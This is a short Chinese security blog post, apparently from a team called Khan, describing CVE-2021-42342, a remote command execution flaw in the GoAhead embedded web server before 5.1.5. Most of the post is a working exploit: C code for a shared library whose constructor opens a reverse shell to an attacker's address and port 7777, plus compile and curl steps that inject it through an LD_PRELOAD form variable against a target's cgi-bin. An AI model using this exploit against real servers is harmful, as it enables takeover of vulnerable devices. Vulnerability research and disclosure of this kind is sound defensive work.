CVE-2021-42342 GoAhead远程命令执行

原创

Khan安全团队

发布于 2022-01-06 09:57:31

1.7K0

文章被收录于专栏：Khan安全团队Khan安全团队

GoAhead 是用网世界上的微型嵌入式 Web 服务器。它结构化、安全且易于使用。GoAhead 部署在数亿台设备中，是小型嵌入式设备的理想选择。

最近 Goahead Webserver 中的一个 bug 是由William Bowling发现的，它导致被利用的服务器上的 RCE。

该问题存在于 5.1.5 版本之前，根据Shodan 的说法，该版本涵盖了互联网上大约 2.8mio 的服务器。

RCE 是因为如果启用文件上传过滤器，则用户可以上传文件，同时设置用户表单变量。

这些变量最终成为操作系统环境变量。这通常不是问题，因为在正常的表单上传情况下，env 变量将以 CGI_ 为前缀（默认）。但是，如果启用了文件上传过滤器，则代码中的错误会导致忽略此前缀 = 通过 env 变量的即时 RCE + 文件。

CVE-2021-42342 RCE

POC1:just prints

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello World!\n", 14);
}

POC2: reverse shell

#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

char *server_ip="***";
uint32_t server_port=7777;

static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}

usage:

step1: gcc hack.c -fPIC -shared -o poc.so

step2: curl -X POST http://[TARGET]/cgi-bin/ -F "LD_PRELOAD=/proc/self/fd/0" -F file='@poc.so;encoder=base64'

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

编程算法